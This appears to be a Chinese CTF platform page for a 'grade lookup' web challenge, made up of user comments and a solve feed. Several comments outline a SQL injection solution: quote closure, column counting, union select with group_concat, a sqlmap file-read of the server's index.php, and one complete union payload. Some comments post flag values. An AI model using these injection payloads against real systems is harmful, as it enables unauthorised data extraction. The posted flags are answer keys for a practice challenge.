成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 8761
提  示:
描  述:
来源山科大ctf
评论
admmin1 1天前

https://blog.csdn.net/lwpoor123/article/details/85236496#:~:text=%E5%88%A9%E7%94%A8%20sql#:~:text=%E5%88%A9%E7%94%A8%20sql

回复 0

whitenul 2天前

flag{b2cb3cd1f57e3463dfc447e50f1058bf}

回复 0

evenjoy 12天前

1、确定为sql注入 2、group by 检查显示字段个数 3、联合注入配合group_concat() 查有哪些数据库(skctf) 4、联合注入配合group_concat() 查skctf库下有哪些表(fl4g) 5、联合注入配合group_concat() 查fl4g表下有哪些字段(skctf_flag) 6、联合注入查skctf_flag的值

回复 0

x.0.x 16天前

环境有问题

回复 0

docker0w 1月前

1. sqlmap读文件 --file-read=/var/www/html/index.php 2. 通过源代码得知库为:skctf 表为:fl4g 3. dump即可

回复 1

DK. 1月前

这题不错

回复 0

哥哥 2月前

flag{01c89f505e9db1ee17941ad22f53899f}

回复 0

脚本小子admin 3月前

1.判断为字符型,单引号闭合,语句:1' and 1=1 #(正常显示) 和 1' and 1=2 (不显示)# 2.order by 判断数量 3.union 联合注入

回复 0

wugan777 3月前

flag{0ae5f6b4af2192ee4dc59b22f0498715}

回复 0

爱莉希雅 3月前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g# 打出就行

回复 3
17776194915 3月前

有流程吗大佬

回复 0

WriteUp

image
harry

2 金币

评分(21)

解题动态

kunyi 攻破了该题 4小时前
hsyqs 攻破了该题 5小时前
magic317803335 攻破了该题 5小时前
zs2011469 攻破了该题 5小时前
liushuyue 攻破了该题 7小时前
RTio7 攻破了该题 10小时前
lzz0403 攻破了该题 11小时前
yangxuhui 攻破了该题 11小时前
Zacks 攻破了该题 12小时前
THE-ONE 攻破了该题 15小时前
InfoSec 攻破了该题 17小时前
admmin1 攻破了该题 1天前
8008120286 攻破了该题 1天前
wangqi666 攻破了该题 1天前
cbb02 攻破了该题 1天前
1980753 攻破了该题 1天前
xuangou123 攻破了该题 1天前
febmarre 攻破了该题 1天前
dcl123 攻破了该题 1天前
whitenul 攻破了该题 2天前
问题反馈